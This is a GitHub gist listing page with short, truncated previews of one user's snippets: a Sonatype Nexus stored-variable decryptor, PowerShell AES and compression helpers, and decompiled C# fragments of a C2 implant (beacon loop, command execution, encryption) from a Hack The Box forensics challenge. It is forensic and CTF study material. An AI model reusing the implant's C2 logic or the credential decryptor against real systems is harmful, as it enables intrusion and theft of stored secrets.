khr0x40sh
khr0x40sh
/ decrypt.py
Created
June 5, 2024 16:38
Sonatype NEXUS Repository Manager stored variable decryptor
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import hashlib | |
| import base64 | |
| import argparse | |
| from Crypto.Cipher import AES | |
| class AES_pkcs5: | |
| def __init__(self, key: str, mode: AES.MODE_ECB = AES.MODE_ECB, block_size: int = 16): | |
| self.key = self.setKey(key) | |
| self.mode = mode | |
| self.block_size = block_size |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from random import randint, shuffle | |
| from Crypto.Util.number import getPrime | |
| from hashlib import sha256 | |
| class BBS: | |
| def __init__(self, bits, length): | |
| self.bits = bits | |
| self.out_length = length | |
| def reset_params(self): |
khr0x40sh
/ PowershellAes.ps1
Created
April 6, 2023 17:21
— forked from ctigeek/PowershellAes.ps1
Aes Encryption using powershell.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Create-AesManagedObject($key, $IV) { | |
| $aesManaged = New-Object "System.Security.Cryptography.AesManaged" | |
| $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC | |
| $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros | |
| $aesManaged.BlockSize = 128 | |
| $aesManaged.KeySize = 256 | |
| if ($IV) { | |
| if ($IV.getType().Name -eq "String") { | |
| $aesManaged.IV = [System.Convert]::FromBase64String($IV) | |
| } |
khr0x40sh
/ psCompress.ps1
Created
April 6, 2023 17:16
— forked from marcgeld/psCompress.ps1
Powershell: Compress and decompress byte array
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Compress and decompress byte array | |
| function Get-CompressedByteArray { | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)] | |
| [byte[]] $byteArray = $(Throw("-byteArray is required")) | |
| ) | |
| Process { |
khr0x40sh
/ decrypt_phase3.py
Created
March 23, 2023 20:14
HTB:CA2023 Forensics Interstellar Phase 3 Decryptor
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import base64 | |
| from Crypto.Cipher import AES | |
| import gzip, zlib | |
| def decrypt(data, key): | |
| cipher = AES.new(key, AES.MODE_CBC, data[:AES.block_size]) | |
| return cipher.decrypt(data[AES.block_size:]) | |
| def decompress(data): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| internal static class ImgGen | |
| { | |
| // Token: 0x06000020 RID: 32 RVA: 0x00003478 File Offset: 0x00001678 | |
| internal static void Init(string stringIMGS) | |
| { | |
| IEnumerable<string> source = from Match m in Program.ImgGen._re.Matches(stringIMGS.Replace(",", "")) | |
| select m.Value; | |
| source = from m in source | |
| where !string.IsNullOrEmpty(m) | |
| select m; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Program | |
| // Token: 0x06000011 RID: 17 RVA: 0x000025C8 File Offset: 0x000007C8 | |
| private static void primer() | |
| { | |
| if (DateTime.ParseExact("2025-01-01", "yyyy-MM-dd", CultureInfo.InvariantCulture) > DateTime.Now) | |
| { | |
| Program.dfs = 0; | |
| string text = ""; | |
| try | |
| { |
khr0x40sh
/ Encryption.cs
Created
March 23, 2023 18:36
HTB:CA2023 Forensics Interstellar Encryption C2 Function
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| private static string Encryption(string key, string un, bool comp = false, byte[] unByte = null) | |
| { | |
| byte[] array = null; | |
| if (unByte != null) | |
| { | |
| array = unByte; | |
| } | |
| else | |
| { | |
| array = Encoding.UTF8.GetBytes(un); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Program | |
| // Token: 0x06000016 RID: 22 RVA: 0x00002C38 File Offset: 0x00000E38 | |
| public static void Exec(string cmd, string taskId, string key = null, byte[] encByte = null) | |
| { | |
| if (string.IsNullOrEmpty(key)) | |
| { | |
| key = Program.pKey; | |
| } | |
| string cookie = Program.Encryption(key, taskId, false, null); | |
| string s; |
khr0x40sh
/ ImplantCore.cs
Created
March 23, 2023 18:22
HTB:CA2023 Forensics Interstellar Implant Core C2 Function
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Program | |
| // Token: 0x06000017 RID: 23 RVA: 0x00002CDC File Offset: 0x00000EDC | |
| private static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS, string Jitter) | |
| { | |
| Program.UrlGen.Init(stringURLS, RandomURI, baseURL); | |
| Program.ImgGen.Init(stringIMGS); | |
| Program.pKey = Key; | |
| int num = 5; | |
| Regex regex = new Regex("(?<t>[0-9]{1,9})(?<u>[h,m,s]{0,1})", RegexOptions.IgnoreCase | RegexOptions.Compiled); | |
| Match match = regex.Match(Sleep); |
NewerOlder